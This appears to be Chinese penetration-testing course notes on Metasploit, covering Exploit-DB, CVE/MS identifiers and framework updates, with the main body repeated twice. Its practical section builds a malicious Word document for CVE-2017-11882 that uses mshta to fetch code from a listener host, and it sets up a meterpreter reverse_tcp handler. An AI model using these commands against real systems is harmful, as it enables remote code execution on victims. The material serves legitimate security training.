4.Metasploit框架更新
Metasploit 进阶第二讲 框架更新
EDB平台-互联网安全漏洞库
Exploit_DB是一个面向全世界安全工作人员的漏洞提交平台,是一份公开已知漏洞的存档,便于企业改善公司的安全情况,同时帮助安全研究人员及渗透测试工程师进行更好的安全测试工作。
exploits:漏洞信息
papers:文章
GHDB: Google hacking
shellcodes:填充数据
CVE-2017-11882介绍
CVE-2017-11882Ofice远程代码执行漏洞:
由Microsoft office中的公式编辑器造成,该模块以OLE(Object Linking and Embedding,对象链接与嵌入)技术将公式嵌入在Office文档内,由于编辑器没有对名称长度进行校验,导致缓冲区溢出,若攻击者通过构造特殊字符,office无法正确处理内存对象,成功利用该漏洞的攻击者将能以当前用户身份在目标操作系统执行任意代码。
完美无弹窗,无异常,影响office全版本。
CVE和MS:
CVE是Common Vulnerabilities and Exposures的缩写,意思是公共漏洞及披露。它是一个漏洞字典,由MITRE维护,给每个暴露出来漏洞给一个公共的名称。可以在cve.mitre.org/cve/index.html中查看漏洞列表。
MS是微软维护的自身的漏洞列表。可以在technet.microsoft.com/en-
us/security/bulletins查找最新的各种相关信息。
由于两者标准不统一,为了更好对应,MITRE提供一个对应列表cve.mitre.org/data/refs/refmap/source-MS.html。
MSF添加exploit及更新Metasploit框架
添加exploit:
1.将下载的rb文件放入对应的文件夹下
2.执行reload_all或重新启动MSF
更新metasploit框架:
apt update;apt install metasploit-framework
实操:利用CVE-2017-11882攻击目标主机
MSF:
search 2017_11882
use exploit/windows/...
info
show options
set uripath/
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.24.137
run
生成POC程序(带有shell的doc文件):
python CVE-2017-11882.py -c“mshta
http://192.168.24.137:8080/"-o11882.doc
其他POC程序生成:
https://github.com/Ridter/CVE-2017-11882
python CVE-2017-11882.py-c"cmd.exe/c
calc.cxe" –o 11882.doc
metasploit攻击win8实例
Microsoft Windows OLE远程代码执行漏洞(CVE-2014-6332、MS14-064):
OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。
Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008
SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012
Gold/R2,Windows RT Gold/8.1版本在实现上存在Windows OLE自动化数组远程代码执行漏洞,远程攻击者利用此漏洞构造特殊的网页,用户使用IE浏览器查看网页时允许远程执行任意代码。
可能会遇到的问题:
1.Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444)
lsof-i:4444 -> kill -9 PID(man lsof -> man kill)
2.注意查看报错信息,多检索
metasploit框架打开方式:
msfconsole 启动命令行模式
armitage 启动图形化界面方式
Metasploit 进阶第二讲
框架更新
01 Exploit_db平台介绍
02 MSF添加exploit更新MSF
03 CVE-2017-11882利用实例
04合天网安实验室攻击win8实例
EDB平台-互联网安全漏洞库
Exploit_DB是一个面向全世界安全工作人员的漏洞提交平台,是一份公开已知漏洞的存档,便于企业改善公司的安全情况,同时帮助安全研究人员及渗透测试工程师进行更好的安全测试工作。
exploits:漏洞信息
papers:文章
GHDB: Google hacking
shellcodes:填充数据
CVE-2017-11882介绍
CVE-2017-11882Ofice远程代码执行漏洞:
由Microsoft office中的公式编辑器造成,该模块以OLE(Object Linking and Embedding,对象链接与嵌入)技术将公式嵌入在Office文档内,由于编辑器没有对名称长度进行校验,导致缓冲区溢出,若攻击者通过构造特殊字符,office无法正确处理内存对象,成功利用该漏洞的攻击者将能以当前用户身份在目标操作系统执行任意代码。
完美无弹窗,无异常,影响office全版本。
CVE和MS:
CVE是Common Vulnerabilities and Exposures的缩写,意思是公共漏洞及披露。它是一个漏洞字典,由MITRE维护,给每个暴露出来漏洞给一个公共的名称。可以在cve.mitre.org/cve/index.html中查看漏洞列表。
MS是微软维护的自身的漏洞列表。可以在technet.microsoft.com/en-
us/security/bulletins查找最新的各种相关信息。
由于两者标准不统一,为了更好对应,MITRE提供一个对应列表cve.mitre.org/data/refs/refmap/source-MS.html。
MSF添加exploit及更新Metasploit框架
添加exploit:
1.将下载的rb文件放入对应的文件夹下
2.执行reload_all或重新启动MSF
更新metasploit框架:
apt update;apt install metasploit-framework
实操:利用CVE-2017-11882攻击目标主机
MSF:
search 2017_11882
use exploit/windows/...
info
show options
set uripath/
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.24.137
run
生成POC程序(带有shell的doc文件):
python CVE-2017-11882.py -c“mshta
http://192.168.24.137:8080/"-o11882.doc
其他POC程序生成:
https://github.com/Ridter/CVE-2017-11882
python CVE-2017-11882.py-c"cmd.exe/c
calc.cxe" –o 11882.doc
合天网安实验室:metasploit攻击win8实例
Microsoft Windows OLE远程代码执行漏洞(CVE-2014-6332、MS14-064):
OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。
Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008
SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012
Gold/R2,Windows RT Gold/8.1版本在实现上存在Windows OLE自动化数组远程代码执行漏洞,远程攻击者利用此漏洞构造特殊的网页,用户使用IE浏览
器查看网页时允许远程执行任意代码。
可能会遇到的问题:
- Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444)
lsof-i:4444 -> kill -9 PID(man lsof -> man kill)
2.注意查看报错信息,多检索
metasploit框架打开方式:
msfconsole 启动命令行模式
armitage 启动图形化界面方式

4.Metasploit框架更新的更多相关文章
- iOS将自己的框架更新到cocopods上
第一步 把自己的框架更新到github 上,为了提交地址给他人下载.这里就不详细介绍如何把项目更新到github上了 第二步 这个时候我们的项目已经挂在github上了我们需要给本地的项目新建一个Po ...
- iOS中 如何将自己的框架更新到cocopods上 韩俊强的博客
每日更新关注:http://weibo.com/hanjunqiang 新浪微博! 为了更方便的集成第三方框架有了cocopods 的, 当我们有了相对比较好的框架的时候如何更新到cocopods ...
- 将自己的框架更新到cocopods上
为了更方便的集成第三方框架有了cocopods 的, 当我们有了相对比较好的框架的时候如何更新到cocopods 供他人参考呢? 下面我一步一步带大家开源自己的框架. 第一步 把自己的框架更新到git ...
- 认识Metasploit框架
Metasploit基础 认识Metaspliot框架 Metaspliot(MSF)渗透测试框架,提供众多的接口.选项.变量.模块以供渗透工作人员使用它完成一系列的渗透攻击. 渗透攻击(Expl ...
- BitAdminCore框架更新日志20180531
索引 NET Core应用框架之BitAdminCore框架应用篇系列 框架演示:http://bit.bitdao.cn 框架源码:https://github.com/chenyinxin/coo ...
- BitAdminCore框架更新日志20180529
索引 NET Core应用框架之BitAdminCore框架应用篇系列 框架演示:http://bit.bitdao.cn 框架源码:https://github.com/chenyinxin/coo ...
- BitAdminCore框架更新日志20180523
20180523更新内容 本次更新两个内容,一是增加视频处理功能,二是增加定时服务功能. 视频处理 定时服务 BitAdminCore框架,用最少的代码,实现最多的功能 本次新暂未发布,后续有空发布 ...
- BitAdminCore框架更新日志20180522
20180522更新内容 本次更新增加了excel导入导出示例,QuerySuite组件实现导出导出,用最少代码,做最多的事,代码就是如此简单. 计划修改内容 1.人脸登录功能需要重构,目前功能不完善 ...
- BitAdminCore框架更新日志20180519
20180519更新内容 昨天更新的版本,早上自己下载下来发现创建项目不成功. 这个问题已经多次出现,主要是cookiecutter编码问题,项目引用大量外部js文件,部分文件在复制的时候编码较验不通 ...
随机推荐
- Python 【基础常识概念】
深浅拷贝 浅copy与deepcopy 浅copy: 不管多么复杂的数据结构,浅拷贝都只会copy一层 deepcopy : 深拷贝会完全复制原变量相关的所有数据,在内存中生成一套完全一样的内容,我们 ...
- Yaml文件,超详细讲解
YAML文件简单介绍 YAML 是一种可读性非常高,与程序语言数据结构非常接近.同时具备丰富的表达能力和可扩展性,并且易于使用的数据标记语言. YAML全称其实是"YAML Ain't a ...
- C++ 判断两个圆是否有交集
#define _CRT_SECURE_NO_WARNINGS #include<stdio.h> #include <math.h> #include <easyx.h ...
- VS配置C++依赖包
处理好三个东西 1.头文件,Configuration Properties → VC++ Directories → Include Directories 2.静态库,Configuration ...
- 【Weiss】【第03章】练习3.15:自调整链表
[练习3.15] a.写出自调整表的数组实现.自调整表如同一个规则的表,但是所有的插入都在表头进行. 当一个元素被Find访问时,它就被移到表头而并不改变其余的项的相对顺序. b.写出自调整表的链表实 ...
- 《深入理解 Java 虚拟机》读书笔记:早期(编译期)优化
正文 Java 语言的 3 类编译器: 前端编译器:把 java 文件 转变成 class 文件.例如:Sun 的 Javac. JIT 编译器(即时编译器):后端运行期编译器,把字节码转变成机器码. ...
- docker系列详解<一>之docker安装
1.Docker 要求 CentOS 系统的内核版本高于 3.10 ,查看本页面的前提条件来验证你的CentOS 版本是否支持 Docker . 通过 uname -r 命令查看你当前的内核版本 $ ...
- Mol Cell Proteomics. | Prediction of LC-MS/MS properties of peptides from sequence by deep learning (通过深度学习技术根据肽段序列预测其LC-MS/MS谱特征) (解读人:梅占龙)
通过深度学习技术根据肽段序列预测其LC-MS/MS谱特征 解读人:梅占龙 质谱平台 文献名:Prediction of LC-MS/MS properties of peptides from se ...
- Android 登陆功能的实现(访问WebServices 解析返回的JSON结果)
1. WebServices返回的JSON结果 { , "Result": [{ ", ", ", " }] } 2.访问WEB服务代码 i ...
- Splunk 基本使用
Splunk 作为大数据搜索处理软件,作为行业的翘楚,绝对值得探索和学习,Splunk能实时对任何应用程序.服务器或者网络设备的数据和数据源进行搜索和索引,包括任何位置的日志.配置文件.信息.陷阱和预 ...